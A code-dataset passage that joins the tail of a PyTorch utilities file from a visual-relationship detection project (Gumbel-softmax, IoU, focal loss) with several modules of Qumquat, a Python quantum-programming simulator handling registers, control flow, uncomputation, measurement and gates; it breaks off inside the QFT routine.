    # Perturb the logits with Gumbel noise, then temperature-softmax.
    perturbed = logits + Variable(noise)
    return my_softmax(perturbed / tau, axis=-1)
def gumbel_softmax(logits, tau=1, hard=False, eps=1e-10):
    """
    NOTE: Stolen from https://github.com/pytorch/pytorch/pull/3341/commits/327fcfed4c44c62b208f750058d14d4dc1b9a9d3
    Sample from the Gumbel-Softmax distribution and optionally discretize.
    Args:
      logits: [batch_size, n_class] unnormalized log-probs
      tau: non-negative scalar temperature
      hard: if True, take argmax, but differentiate w.r.t. soft sample y
    Returns:
      [batch_size, n_class] sample from the Gumbel-Softmax distribution.
      If hard=True, then the returned sample will be one-hot, otherwise it will
      be a probability distribution that sums to 1 across classes
    Constraints:
      - this implementation only works on batch_size x num_features tensor for now
    based on
    https://github.com/ericjang/gumbel-softmax/blob/3c8584924603869e90ca74ac20a6a03d99a91ef9/Categorical%20VAE.ipynb ,
    (MIT license)
    """
    y_soft = gumbel_softmax_sample(logits, tau=tau, eps=eps)
    if hard:
        shape = logits.size()
        # k: argmax class index per row of the soft sample.
        _, k = y_soft.data.max(-1)
        # this bit is based on
        # https://discuss.pytorch.org/t/stop-gradients-for-st-gumbel-softmax/530/5
        y_hard = torch.zeros(*shape)
        if y_soft.is_cuda:
            y_hard = y_hard.cuda()
        # Scatter 1.0 into each row's argmax slot -> exact one-hot tensor.
        y_hard = y_hard.zero_().scatter_(-1, k.view(shape[:-1] + (1,)), 1.0)
        # this cool bit of code achieves two things:
        # - makes the output value exactly one-hot (since we add then
        # subtract y_soft value)
        # - makes the gradient equal to y_soft gradient (since we strip
        # all other gradients)
        y = Variable(y_hard - y_soft.data) + y_soft
    else:
        y = y_soft
    return y
def read_roidb(roidb_path):
    ''' python3: load a roidb dict saved via np.savez.

    The roidb is stored as a 0-d object array under the archive's first
    key; the trailing [()] unwraps it back into the original dict.

    SECURITY NOTE: allow_pickle=True runs the pickle machinery on load --
    only use on trusted files. NumPy >= 1.16.3 defaults allow_pickle to
    False, which made the original call raise ValueError on these
    pickled-object archives; this is the fix for that.
    '''
    roidb_file = np.load(roidb_path, encoding='latin1', allow_pickle=True)
    key = list(roidb_file.keys())[0]
    roidb_temp = roidb_file[key]
    roidb = roidb_temp[()]
    return roidb
def box_id(ori_box, uni_box):
    '''
    input:
        ori_box: the sub or obj box ordinates
        uni_box: the unique box ordinates
    output:
        the idx of the ori_box based on the unique box
    '''
    matches = []
    for box in ori_box:
        for pos, candidate in enumerate(uni_box):
            if np.array_equal(box, candidate):
                matches.append(pos)
    return matches
def compute_iou_each(box1, box2):
    '''
    function: calculate the IoU of two boxes from their ordinates
    box1: [x_min, y_min, x_max, y_max]
    '''
    ix_min = max(box1[0], box2[0])
    iy_min = max(box1[1], box2[1])
    ix_max = min(box1[2], box2[2])
    iy_max = min(box1[3], box2[3])
    # Degenerate intersection rectangle means no overlap at all.
    if ix_max < ix_min or iy_max < iy_min:
        return 0
    # +1 everywhere: box coordinates are inclusive pixel indices.
    inter = (ix_max - ix_min + 1) * (iy_max - iy_min + 1)
    area1 = (box1[2] - box1[0] + 1) * (box1[3] - box1[1] + 1)
    area2 = (box2[2] - box2[0] + 1) * (box2[3] - box2[1] + 1)
    return inter / float(area1 + area2 - inter)
def get_item(arr, idx, idy):
    '''Gather arr[idx[i], idy[i]] for each i into a float array.'''
    out = np.zeros(len(idx))
    for pos, (i, j) in enumerate(zip(idx, idy)):
        out[pos] = arr[i, j]
    return out
def encode_onehot(labels):
    '''One-hot encode labels.

    Class order follows set(labels) iteration order, matching the original
    implementation (deterministic per interpreter, not per input order).
    '''
    classes = set(labels)
    identity = np.identity(len(classes))
    class_rows = {cls: identity[row, :] for row, cls in enumerate(classes)}
    return np.array([class_rows[label] for label in labels], dtype=np.int32)
def one_hot_embedding(labels, num_classes):
    '''Embedding labels to one-hot form.
    Args:
      labels: (LongTensor) class labels, sized [N,].
      num_classes: (int) number of classes.
    Returns:
      (tensor) encoded labels, sized [N,#classes].
    '''
    # Row i of the identity matrix is the one-hot vector for class i,
    # so indexing by `labels` gathers one row per label.
    return torch.eye(num_classes)[labels]  # [D,D] indexed -> [N,D]
class FocalLoss(nn.Module):
    """Per-sample binary focal loss over per-class scores, background excluded.

    NOTE(review): forward() feeds log-softmax-probabilities (p.log()) into
    binary_cross_entropy_with_logits, which applies a *second* sigmoid to
    them; the reference RetinaNet implementation passes the raw logits x
    instead. Confirm this deviation is intentional before relying on it.
    """
    def __init__(self, num_classes=20, alpha=0.25, gamma=2):
        super(FocalLoss, self).__init__()
        self.num_classes = num_classes  # number of foreground classes
        self.alpha = alpha              # weight for positive (t=1) terms
        self.gamma = gamma              # focusing exponent on (1 - pt)
    def forward(self, x, y):
        '''Focal loss.
        Args:
          x: (tensor) sized [N,D].
          y: (tensor) sized [N,].
        Return:
          (tensor) focal loss, one value per sample (summed over classes).
        '''
        # one_hot over 1+num_classes so label 0 can act as background,
        # which is then sliced away below.
        t = one_hot_embedding(y.data.cpu(), 1+self.num_classes)  # [N,D]
        t = t[:,:self.num_classes]  # exclude background
        t = Variable(t).cuda()  # [N,D-1]  (requires a CUDA device)
        x = x[:,:self.num_classes]
        p = F.softmax(x, dim=-1)
        pt = p*t + (1-p)*(1-t)  # pt = p if t > 0 else 1-p
        w = self.alpha*t + (1-self.alpha)*(1-t)  # w = alpha if t > 0 else 1-alpha
        w = w * (1-pt).pow(self.gamma)  # down-weight easy (high-pt) examples
        return F.binary_cross_entropy_with_logits(p.log(), t, w, reduction='none').sum(-1)
|
[
"/DataLoader.py",
"/eval_metrics.py",
"/modules.py",
"/preprocess/ass_fun.py",
"/preprocess/extract_vgg_feature.py",
"/preprocess/process.py",
"/preprocess/vgg.py",
"/train_vg.py",
"/utils.py"
] |
00mjk/Qumquat
|
name = "qumquat"
from .main import Qumquat
import sys
# Module/instance swap: replace this package's module object in sys.modules
# with a single Qumquat instance, so `import qumquat as qq` hands callers the
# interpreter singleton directly (qq.reg(...), qq.measure(...), etc.).
sys.modules[__name__] = Qumquat()
--- FILE SEPARATOR ---
from .qvars import *
# control.py
# - inv
class Control:
    """Mixin providing quantum control flow: inverted and controlled regions."""

    ######################## Invert
    def inv(self):
        """Context manager: operations inside the block are queued, then on
        exit replayed in reverse order with each action inverted."""
        qq = self

        class _InvertedRegion():
            def __enter__(region):
                qq.push_mode("inv")
                qq.queue_stack.append([])

            def __exit__(region, *exc_info):
                qq.pop_mode("inv")
                pending = qq.queue_stack.pop()
                for action in reversed(pending):
                    qq.call(action, invert=True)

        return _InvertedRegion()

    ################### If
    def control(self, expr):
        """Context manager: operations inside the block act only on branches
        where `expr` evaluates to a nonzero value."""
        condition = Expression(expr, self)
        qq = self

        class _ControlledRegion():
            def __enter__(region):
                qq.push_mode("control")
                qq.do_control(condition)

            def __exit__(region, *exc_info):
                qq.pop_mode("control")
                qq.do_control_inv(condition)

        return _ControlledRegion()

    def do_control(self, expr):
        """Push `expr` onto the active control stack (queueable action)."""
        if self.queue_action("do_control", expr): return
        self.controls.append(expr)

    def do_control_inv(self, expr):
        """Pop the most recent control expression (queueable action)."""
        if self.queue_action("do_control_inv", expr): return
        self.controls.pop()
--- FILE SEPARATOR ---
from .qvars import *
class Garbage:
    """Mixin implementing automatic uncomputation of scratch ("garbage")
    registers allocated inside a decorated function."""
    ################### Garbage
    # a decorator that makes function into a with statement
    def garbage(self, f):
        """Decorator: wraps f so its result can be used either lazily as an
        Expression or inside a `with` block that uncomputes f's scratch
        registers on exit."""
        # NOTE(review): WrapGarbage subclasses Expression but builds its own
        # fields by hand (no super().__init__) — presumably deliberate;
        # confirm against Expression's definition in qvars.
        class WrapGarbage(Expression):
            def __init__(s, *args, **kwargs):
                s.args = args
                s.kwargs = kwargs
                s.called = False   # f may only be evaluated once
                s.compute = None   # cached branch-evaluation closure
                s.keys = set([])
                # collect the keys this expression depends on from arguments
                for arg in list(args) + list(kwargs.values()):
                    if isinstance(arg, Expression):
                        s.keys |= arg.keys
                    if isinstance(arg, Key):
                        s.keys |= set([arg.key])
                # lazily evaluate f on first branch evaluation, then reuse
                def run_without_garbage(b):
                    if not s.called:
                        s.called = True
                        out = Expression(f(*s.args, **s.kwargs))
                        s.compute = out.c
                    return s.compute(b)
                s.c = lambda b: run_without_garbage(b)
                s.float = True # can't be determined now, assume the worst.
                s.qq = self
            def __enter__(s):
                if s.called:
                    raise SyntaxError("Function was already evaluated previously - use in with statement at first function call.")
                # record actions and freshly-allocated keys while f runs
                self.queue_stack.append([])
                self.pile_stack_py.append([])
                out = Expression(f(*s.args, **s.kwargs))
                s.pile = self.pile_stack_py.pop()
                return out
            def __exit__(s, ty,val,tr): # ignore exception stuff
                # run f in reverse to uncompute its scratch registers,
                # then hand the recorded queue/pile to do_garbage
                self.pile_stack_py.append(s.pile)
                with self.inv(): f(*s.args, **s.kwargs)
                pile = self.pile_stack_py.pop()
                queue = self.queue_stack.pop()
                self.do_garbage(queue, pile)
        def wrapper(*args,**kwargs):
            return WrapGarbage(*args,**kwargs)
        return wrapper
    def do_garbage(self, queue, pile):
        """Replay `queue` with `pile` active; the pile must be fully consumed
        (all scratch registers uncomputed) or this raises (queueable)."""
        if self.queue_action("do_garbage", queue, pile): return
        self.pile_stack_qq.append(pile)
        for tup in queue: self.call(tup)
        newpile = self.pile_stack_qq.pop()
        if len(newpile) > 0:
            raise SyntaxError("Garbage collector error: pile was not clean after uncomputation.")
    def do_garbage_inv(self, queue, pile):
        """Inverse of do_garbage: replay the queue inverted and in reverse,
        with the pile order reversed to match (queueable)."""
        if self.queue_action("do_garbage_inv", queue, pile): return
        self.queue_stack.append([]) # just reverse the queue
        for tup in queue[::-1]: self.call(tup, invert=True)
        rev_queue = self.queue_stack.pop()
        # also reverse the pile
        pile = pile[::-1]
        self.do_garbage(rev_queue, pile)
--- FILE SEPARATOR ---
from .qvars import *
import math, copy
class Init:
    """Mixin implementing register initialization: from expressions, from
    uniform superpositions over lists, and from amplitude dictionaries."""
    ############################ Base routines
    def init(self, key, val):
        """Initialize register `key` (assumed |0>) to `val`, dispatching on
        the type of `val` (queueable)."""
        if self.queue_action('init', key, val): return
        self.assert_mutable(key)
        # cast ranges to superpositions, permitting qq.reg(range(3))
        if isinstance(val, range): val = list(val)
        if isinstance(val, Key): val = Expression(val)
        if isinstance(val, int) or isinstance(val, es_int): val = Expression(val, self)
        if isinstance(val, Expression):
            self.init_expression(key,val)
        elif isinstance(val, list):
            self.init_list(key,val)
        elif isinstance(val, dict):
            self.init_dict(key,val)
        else:
            raise TypeError("Invalid initialization of register with type ", type(val))
    # takes a register and a guess for what state it is in
    # if the guess is correct, the register is set to |0>
    def init_inv(self, key, val):
        """Uncompute `key`, assuming it currently holds `val` (queueable)."""
        if self.queue_action('init_inv', key, val): return
        self.assert_mutable(key)
        if isinstance(val, range): val = list(val)
        if isinstance(val, Key): val = Expression(val)
        if isinstance(val, int) or isinstance(val, es_int): val = Expression(val, self)
        if isinstance(val, Expression):
            self.init_expression(key,val,invert=True)
        elif isinstance(val, list):
            self.init_list(key,val,invert=True)
        elif isinstance(val, dict):
            self.init_dict(key,val,invert=True)
        else:
            raise TypeError("Invalid un-initialization of register with type ", type(val))
    ############################ Expression
    def init_expression(self,key,expr, invert=False):
        """Set `key` to the branch-wise value of `expr` via a cyclic-shift
        unitary; with invert=True, apply the inverse shift."""
        if expr.float: raise TypeError("Quantum registers can only contain ints")
        if key.key in expr.keys: raise SyntaxError("Can't initialize register based on itself.")
        # strategy:
        # for each value of expr, create a list [0,expr,other,initial,vals]
        # then the unitary simply shifts forward by one
        H = set([b[key.index()] for b in self.controlled_branches()]) - set([es_int(0)])
        for b in self.controlled_branches():
            v = es_int(expr.c(b))
            if v != es_int(0): # if already zero do nothing
                thisH = [es_int(0),v] + sorted(list(H - set([v])))
                idx = thisH.index(b[key.index()])
                if not invert:
                    b[key.index()] = thisH[(idx + 1) % len(thisH)]
                else:
                    b[key.index()] = thisH[(len(thisH) + idx - 1) % len(thisH)]
    ############################ List
    def init_list(self,key,ls, invert=False):
        """Put `key` into a uniform superposition over the values in `ls`
        (or the inverse transformation when invert=True)."""
        # check list for validity, cast to es_int
        for i in range(len(ls)):
            if not (isinstance(ls[i], int) or isinstance(ls[i], es_int)):
                raise TypeError("Superpositions only support integer literals.")
            if ls.index(ls[i]) != i:
                raise ValueError("Superpositions can't contain repeated values.")
            if isinstance(ls[i], int):
                ls[i] = es_int(ls[i])
        p = 1/math.sqrt(len(ls))
        # H: the working basis = existing register values plus target values
        H = (set([b[key.index()] for b in self.controlled_branches()]) | set(ls)) - set([es_int(0)])
        H = [es_int(0)] + list(H)
        U = [{h:complex(p if (h in ls) else 0) for h in H}] # first column of U
        # complete the rest of the matrix via Gram-Schmidt
        for i in H[1:]+H[:1]: # this way it's closer to the identity
            newcol = {h:complex(1 if (h == i) else 0) for h in H}
            for col in U:
                inner = sum([col[h].conjugate()*newcol[h] for h in H])
                for h in H: newcol[h] -= col[h]*inner
            # normalize
            norm = math.sqrt(sum([abs(newcol[h])**2 for h in H]))
            if norm < self.thresh: continue
            for h in H: newcol[h] /= norm
            U.append(newcol)
        if len(U) != len(H): raise ValueError("Error in matrix completion. (This can happen when amplitudes get too small.)")
        if invert:
            # conjugate transpose of U
            newU = []
            for i in H:
                newU.append({h:(U[H.index(h)][i].conjugate()) for h in H})
            U = newU
        # apply U to the register on all controlled branches
        newbranches = []
        goodbranch = lambda b: all([ctrl.c(b) != 0 for ctrl in self.controls])
        for b in self.branches:
            if not goodbranch(b):
                newbranches.append(b)
                continue
            row = U[H.index(b[key.index()])]
            for h in H:
                if abs(row[h]) != 0:
                    newbranch = copy.copy(b)
                    newbranch[key.index()] = h
                    newbranch["amp"] *= row[h]
                    newbranches.append(newbranch)
        self.branches = newbranches
        self.prune()
    ############################ Dictionary
    def init_dict(self,key,dic,invert=False):
        """Put `key` into a superposition with amplitudes given by `dic`
        (value -> amplitude expression); amplitudes may depend on other
        registers, so branches are grouped by those registers' values and a
        separate unitary is built per group."""
        # check if dictionary has integer keys, cast to es_int
        newdic = {}
        keys = set([])
        for k in dic.keys():
            if not isinstance(k, int): raise TypeError("QRAM keys must be integers.")
            newdic[es_int(k)] = Expression(dic[k], qq=self)
            keys |= newdic[es_int(k)].keys
        dic = newdic
        if key.key in keys: raise SyntaxError("Can't initialize register based on itself.")
        keys = [Key(self,val=k) for k in keys]
        ############## sort branches into groups with equal value
        def branchesEqual(b1, b2):
            # b1, b2 are branch *indices*; equal iff all amplitude-relevant
            # registers agree
            for k in keys:
                if self.branches[b1][k.index()] != self.branches[b2][k.index()]:
                    return False
            return True
        branch_type_counter = 0
        branchtypes = {}
        goodbranch = lambda b: all([ctrl.c(b) != 0 for ctrl in self.controls])
        for i in range(len(self.branches)):
            b = self.branches[i]
            if not goodbranch(b): continue
            found = False
            for j in branchtypes:
                if branchesEqual(branchtypes[j][0], i):
                    found = True
                    branchtypes[j].append(i)
                    break
            if not found:
                branchtypes[branch_type_counter] = [i]
                branch_type_counter += 1
                continue
        ############ determine unitary for each group
        H = set([b[key.index()] for b in self.controlled_branches()])
        H = (H | set(dic.keys())) - set([es_int(0)])
        H = [es_int(0)] + list(H)
        unitaries = []
        for j in range(branch_type_counter):
            # first column: the (normalized) target amplitudes for this group
            norm = 0
            for k in dic.keys(): norm += abs( dic[k].c(self.branches[branchtypes[j][0]]) )**2
            norm = math.sqrt(norm)
            U = [{h:(dic[h].c(self.branches[branchtypes[j][0]])/norm\
                    if h in dic.keys() else complex(0)) for h in H}]
            # complete the rest of the matrix via Gram-Schmidt
            for i in H[1:]+H[:1]: # this way it's closer to the identity
                newcol = {h:complex(1 if (h == i) else 0) for h in H}
                for col in U:
                    inner = sum([col[h].conjugate()*newcol[h] for h in H])
                    for h in H: newcol[h] -= col[h]*inner
                # normalize
                norm = math.sqrt(sum([abs(newcol[h])**2 for h in H]))
                if norm < self.thresh: continue
                for h in H: newcol[h] /= norm
                U.append(newcol)
            if len(U) != len(H): raise ValueError("Error in matrix completion. (This can happen when amplitudes get too small.)")
            if invert:
                # conjugate transpose for the inverse transformation
                newU = []
                for i in H:
                    newU.append({h:(U[H.index(h)][i].conjugate()) for h in H})
                unitaries.append(newU)
            else:
                unitaries.append(U)
        ########### apply unitary
        newbranches = []
        for i in range(len(self.branches)):
            b = self.branches[i]
            if not goodbranch(b):
                newbranches.append(b)
                continue
            # find this branch's group; its unitary is unitaries[j]
            for j in range(branch_type_counter):
                if i in branchtypes[j]: break
            U = unitaries[j]
            row = U[H.index(b[key.index()])]
            for h in H:
                if abs(row[h]) != 0:
                    newbranch = copy.copy(b)
                    newbranch[key.index()] = h
                    newbranch["amp"] *= row[h]
                    newbranches.append(newbranch)
        self.branches = newbranches
        self.prune()
--- FILE SEPARATOR ---
from .qvars import *
import cmath
# keys.py:
# - clear
# - prune
# - alloc
# - reg
# - clean
# - expr
class Keys:
    """Mixin managing registers: clearing state, pruning branches, and
    allocating/deallocating registers behind user-facing reg()/clean()."""
    ############################ Clear and prune
    # delete all variables and start anew
    def clear(self):
        """Reset the interpreter to a single empty |0> branch; illegal while
        any control flow, queue, pile, or mode is active."""
        if len(self.controls) > 0 or len(self.queue_stack) > 0 or\
           len(self.pile_stack_py) > 0 or len(self.mode_stack) > 0:
            raise SyntaxError("Cannot clear inside quantum control flow.")
        self.key_dict = {}
        self.branches = [{"amp": 1+0j}]
    # get rid of branches with tiny amplitude
    # merge branches with same values
    def prune(self):
        """Merge branches with identical register values, drop branches with
        amplitude below self.thresh, then renormalize."""
        norm = 0
        mergedbranches = []
        for branch in self.branches:
            found = False
            for comp_branch in mergedbranches:
                same = True
                for key in branch.keys():
                    if key == "amp": continue
                    if branch[key] != comp_branch[key]:
                        same = False
                        break
                if same:
                    found = True
                    comp_branch["amp"] += branch["amp"]
            if not found: mergedbranches.append(branch)
        newbranches = []
        for branch in mergedbranches:
            if abs(branch["amp"]) > self.thresh:
                newbranches.append(branch)
        for branch in newbranches:
            norm += abs(branch["amp"])**2
        norm = cmath.sqrt(norm)
        self.branches = newbranches
        for branch in self.branches:
            branch["amp"] /= norm
    ############################ Alloc and dealloc
    def alloc(self, key):
        """Create a fresh register for `key`, initialized to 0 on every
        branch (queueable)."""
        if self.queue_action('alloc', key): return
        self.assert_mutable(key)
        if key.allocated():
            raise SyntaxError("Attempted to allocate already allocated key.")
        reg = self.reg_count
        self.key_dict[key.key] = reg
        self.reg_count += 1
        for branch in self.branches: branch[reg] = es_int(0)
    def alloc_inv(self, key):
        """Deallocate `key`'s register; the register must hold 0 on all
        controlled branches. Handles garbage-pile proxy keys (queueable)."""
        if self.queue_action('alloc_inv', key): return
        self.assert_mutable(key)
        if key.allocated(): # this is just a regular key deallocation
            target = key
            proxy = None
        else: # we are the proxy for another key
            target = key.partner()
            proxy = key
        for branch in self.controlled_branches():
            if branch[target.index()] != 0: raise ValueError("Failed to clean register.")
        # remove the register from the branches and key_dict
        for branch in self.branches: branch.pop(target.index())
        self.key_dict[target.key] = None
        pile = key.pile()
        if not target.allocated() and pile is not None:
            # remove proxy if it exists
            if proxy is not None:
                for i in range(len(pile)):
                    if pile[i].key == proxy.key:
                        del pile[i]
                        break
            # remove target
            for i in range(len(pile)):
                if pile[i].key == target.key:
                    del pile[i]
                    break
    ########################### User functions for making and deleting registers
    def reg(self, *vals):
        """Allocate and initialize one register per value; returns a single
        Key or a tuple of Keys."""
        out = []
        for val in vals:
            key = Key(self)
            out.append(key)
            # this is not in alloc because it pertains to keys, not registers
            if len(self.pile_stack_py) > 0:
                self.pile_stack_py[-1].append(key)
            self.alloc(key)
            key.init(val)
        if len(out) > 1: return tuple(out)
        else: return out[0]
    def clean(self, key, val):
        """Uncompute `key` (assuming it holds `val`) and deallocate it."""
        self.init_inv(key, val)
        self.alloc_inv(key)
    def expr(self, val):
        """Wrap `val` as an Expression bound to this interpreter."""
        return Expression(val, self)
--- FILE SEPARATOR ---
from .qvars import *
from random import random
import math, copy, cmath
# these modules export a class M, short for Mixin
from .keys import Keys
from .init import Init
from .measure import Measure
from .control import Control
from .garbage import Garbage
from .primitive import Primitive
from .utils import Utils
from .snapshots import Snapshots
# - queue_action, queue_stack
# - call (inversion, controls)
# - assert_mutable
# - controlled_branches
# - key_count, reg_count, key_dict
# - pile_stack, garbage_piles, garbage_stack
# - push_mode, pop_mode, mode_stack
class Qumquat(Keys, Init, Measure, Control, Primitive, Utils, Snapshots, Garbage):
    """Quantum interpreter core, assembled from mixins.

    The package replaces its own module object with a single Qumquat
    instance (see __init__.py), so the mutable class-level attributes below
    act as the one shared interpreter state.
    """
    branches = [{"amp": 1+0j}]  # list of {"amp": complex, reg: es_int, ...}
    queue_stack = [] # list of list of action tuples
    def queue_action(self, action, *data):
        """If an action queue is active, record (action, data) on it and
        return True; otherwise return False (caller should execute now)."""
        if len(self.queue_stack) == 0: return False
        self.queue_stack[-1].append((action, data))
        return True
    def call(self, tup, invert=False):
        """Dispatch a queued (name, args) tuple; with invert=True, call the
        inverse method: 'foo' <-> 'foo_inv'."""
        name, args = tup
        if not invert:
            getattr(self, name)(*args)
        elif name.endswith("_inv"):
            getattr(self, name[:-4])(*args)
        else:
            getattr(self, name + "_inv")(*args)
    controls = [] # list of expressions
    # any keys affecting controls cannot be modified
    def assert_mutable(self, key):
        """Raise unless `key` is a register no active control depends on."""
        if not isinstance(key, Key):
            raise SyntaxError("Operation can only be performed on registers, not expressions.")
        for ctrl in self.controls:
            if key.key in ctrl.keys:
                raise SyntaxError("Cannot modify value of controlling register.")
    # only operate on branches where controls are true
    def controlled_branches(self):
        """Return the branches on which every active control is nonzero."""
        goodbranch = lambda b: all([ctrl.c(b) != 0 for ctrl in self.controls])
        return [b for b in self.branches if goodbranch(b)]
    key_count = 0
    reg_count = 0
    key_dict = {} # dictionary of registers for each key
    pile_stack_py = [] # stack during python run time
    pile_stack_qq = [] # stack during qq execution
    thresh = 1e-10 # threshold for deleting tiny amplitudes.
    print_prob_digs = 5 # print probabilities/amplitudes to this precision
    print_expr_digs = 5 # print values of expressions to this precision
    ################################################ Code regions
    mode_stack = []
    def push_mode(self, mode):
        """Enter a named code region (e.g. "inv", "control")."""
        self.mode_stack.append(mode)
    def pop_mode(self, mode):
        """Leave a named code region; raises on mismatched nesting."""
        if len(self.mode_stack) == 0:
            raise SyntaxError("Mismatched delimiter "+mode+": no starting delimiter")
        x = self.mode_stack[-1]
        if x != mode:
            raise SyntaxError("Mismatched delimiter "+mode+": expected end "+x)
        self.mode_stack.pop()
--- FILE SEPARATOR ---
from .qvars import *
import cmath, math
from random import random
# measure.py
# - dist
# - measure
# - postselect
# - print, print_amp
class Measure:
    """Mixin implementing measurement, postselection, and printing."""
    ######################################## Measurement and printing
    def dist(self, *exprs, branches=False):
        """Return the distribution of the given expressions over branches.

        Returns (values, probs) sorted by value, or (values, probs, configs)
        when branches=True, where configs[i] lists the branch indices that
        produced values[i]. String arguments pass through as literal labels.
        """
        def cast(ex):
            # strings become dummy "expressions" that evaluate to themselves
            if isinstance(ex, str):
                class Dummy():
                    def c(s, b): return ex
                return Dummy()
            return Expression(ex, self)
        def dofloat(ex):
            if isinstance(ex, str):
                return ex
            else: return round(float(ex), self.print_expr_digs)
        exprs = [cast(expr) for expr in exprs]
        values = []
        configs = []
        probs = []
        for i in range(len(self.branches)):
            branch = self.branches[i]
            if len(exprs) == 1:
                val = dofloat(exprs[0].c(branch))
            else:
                val = tuple([dofloat(expr.c(branch)) for expr in exprs])
            if val not in values:
                values.append(val)
                configs.append([i])
                probs.append(abs(branch["amp"])**2)
            else:
                idx = values.index(val)
                configs[idx].append(i)
                probs[idx] += abs(branch["amp"])**2
        # sort outcomes by value for stable display/return order
        idxs = list(range(len(probs)))
        idxs.sort(key=lambda i:values[i])
        values = [values[i] for i in idxs]
        probs = [probs[i] for i in idxs]
        configs = [configs[i] for i in idxs]
        if branches:
            return values, probs, configs
        else:
            return values, probs
    def measure(self, *var):
        """Sample an outcome of the given expressions, collapse the
        superposition onto the matching branches, and return the value."""
        if len(self.mode_stack) > 0:
            raise SyntaxError("Can only measure at top-level.")
        # still need to queue since measuring is allowed inside garbage collected environment
        if self.queue_action('measure', *var): return
        values, probs, configs = self.dist(*var, branches=True)
        # pick outcome
        r = random()
        cumul = 0
        pick = -1
        for i in range(len(probs)):
            if cumul + probs[i] > r:
                pick = i
                break
            else: cumul += probs[i]
        # collapse superposition
        self.branches = [self.branches[i] for i in configs[pick]]
        for branch in self.branches:
            branch["amp"] /= math.sqrt(probs[pick])
        return values[pick]
    def postselect(self, expr):
        """Keep only branches where `expr` is nonzero; renormalize and return
        the probability of success. Raises if no branch survives."""
        if len(self.mode_stack) > 0:
            raise SyntaxError("Can only measure at top-level.")
        if self.queue_action('postselect', expr): return
        expr = Expression(expr, self)
        newbranches = []
        prob = 0
        for branch in self.branches:
            if expr.c(branch) != 0:
                newbranches.append(branch)
                prob += abs(branch["amp"])**2
        if len(newbranches) == 0:
            raise ValueError("Postselection failed!")
        self.branches = newbranches
        for branch in self.branches:
            branch["amp"] /= math.sqrt(prob)
        return float(prob)
    def print(self, *exprs):
        """Print the probability distribution of the given expressions."""
        if self.queue_action('print', *exprs): return
        values, probs, configs = self.dist(*exprs, branches=True)
        s = []
        # print distribution
        for i in range(len(values)):
            if isinstance(values[i], tuple):
                st = " ".join([str(x) for x in list(values[i])])
            else: st = str(values[i])
            s.append(st + " w.p. " + str(round(probs[i],self.print_prob_digs)))
        print("\n".join(s))
    def print_inv(self, *exprs):
        """Printing is its own inverse (side effect only)."""
        if self.queue_action('print_inv', *exprs): return
        self.print(*exprs)
    def print_amp(self, *exprs):
        """Print the amplitudes (not probabilities) of each outcome."""
        if self.queue_action('print_amp', *exprs): return
        def cast(ex):
            # strings become dummy "expressions" that evaluate to themselves
            if isinstance(ex, str):
                class Dummy():
                    def c(s, b): return ex
                return Dummy()
            return Expression(ex, self)
        exprs = [cast(expr) for expr in exprs]
        values = []
        amplitudes = {}
        def dofloat(ex):
            if isinstance(ex, str):
                return ex
            else: return round(float(ex), self.print_expr_digs)
        for i in range(len(self.branches)):
            branch = self.branches[i]
            if len(exprs) == 1:
                val = dofloat(exprs[0].c(branch))
            else:
                val = tuple([dofloat(expr.c(branch)) for expr in exprs])
            if val not in values:
                amplitudes[len(values)] = [branch["amp"]]
                values.append(val)
            else:
                idx = values.index(val)
                amplitudes[idx].append(branch["amp"])
        s = []
        idxs = list(range(len(values)))
        idxs.sort(key=lambda i:values[i])
        def show_amp(a):
            # render a complex amplitude as magnitude plus a phase factor,
            # special-casing phases of 0, pi, and +/- pi/2
            r,phi = cmath.polar(a)
            r = round(r,self.print_prob_digs)
            if phi == 0:
                return str(r)
            rounded = round(phi/cmath.pi,self.print_prob_digs*2)
            if round(rounded,self.print_prob_digs) == rounded:
                if int(rounded) in [-1, 1]:
                    return "-"+str(r)
                elif rounded == 0.5:
                    return "1j*"+str(r)
                elif rounded == -0.5:
                    return "-1j*"+str(r)
                elif rounded == 0:
                    return str(r)
                else:
                    return str(r)+"*e^("+str(rounded)+"*pi*i)"
            return str(r)+"*e^(i*"+str(phi)+")"
        # print distribution
        for i in idxs:
            amps = ", ".join([show_amp(a) for a in amplitudes[i]])
            if isinstance(values[i], tuple):
                st = " ".join([str(x) for x in list(values[i])])
            else: st = str(values[i])
            s.append(st + " w.a. " + amps)
        print("\n".join(s))
    def print_amp_inv(self, *exprs):
        """Amplitude printing is its own inverse (side effect only)."""
        if self.queue_action('print_amp_inv', *exprs): return
        self.print_amp(*exprs)
--- FILE SEPARATOR ---
from .qvars import *
import cmath, copy
# primitive.py
# - had, cnot, qft
# - oper
# - phase
# low priority TODO: can these be simplified using new prune function?
class Primitive:
    """Mixin implementing primitive gates: Hadamard, QFT, CNOT, phases, and
    the generic reversible arithmetic hook `oper`.

    NOTE(review): `math` is not imported in this module directly; it is
    presumably re-exported by `from .qvars import *` — confirm.
    """
    ######################################## Hadamard
    def had(self, key, bit):
        """Apply a Hadamard to bit index `bit` of register `key` on all
        controlled branches (queueable)."""
        if self.queue_action('had', key, bit): return
        self.assert_mutable(key)
        bit = Expression(bit, self)
        if key.key in bit.keys: raise SyntaxError("Can't hadamard variable in bit depending on itself.")
        def branchesEqual(b1, b2):
            # NOTE: loop variable shadows the outer `key` parameter (harmless)
            for key in b1.keys():
                if key == "amp": continue
                if b1[key] != b2[key]: return False
            return True
        newbranches = []
        def insert(branch):
            # merge into an existing equal branch instead of duplicating
            for existingbranch in newbranches:
                if branchesEqual(branch, existingbranch):
                    existingbranch["amp"] += branch["amp"]
                    return
            newbranches.append(branch)
        goodbranch = lambda b: all([ctrl.c(b) != 0 for ctrl in self.controls])
        for branch in self.branches:
            if not goodbranch(branch):
                insert(branch)
            else:
                # split into the bit=0 and bit=1 components, with the usual
                # 1/sqrt(2) weights and a sign flip on |1> -> |1>
                idx = bit.c(branch)
                newbranch1 = copy.deepcopy(branch)
                newbranch1["amp"] /= math.sqrt(2)
                newbranch1[key.index()] = es_int(branch[key.index()])
                newbranch1[key.index()][idx] = 0
                newbranch2 = copy.deepcopy(branch)
                newbranch2["amp"] /= math.sqrt(2)
                newbranch2[key.index()] = es_int(branch[key.index()])
                newbranch2[key.index()][idx] = 1
                if branch[key.index()][idx] == 1:
                    newbranch2["amp"] *= -1
                insert(newbranch1)
                insert(newbranch2)
        self.branches = newbranches
        self.prune()
    def had_inv(self, key, bit):
        """Hadamard is self-inverse."""
        self.had(key, bit)
    ######################################## QFT
    def qft(self, key, d, inverse=False):
        """Apply the quantum Fourier transform of dimension `d` to `key`
        (acting within each length-d block of values); queueable."""
        if self.queue_action('qft', key, d, inverse): return
        self.assert_mutable(key)
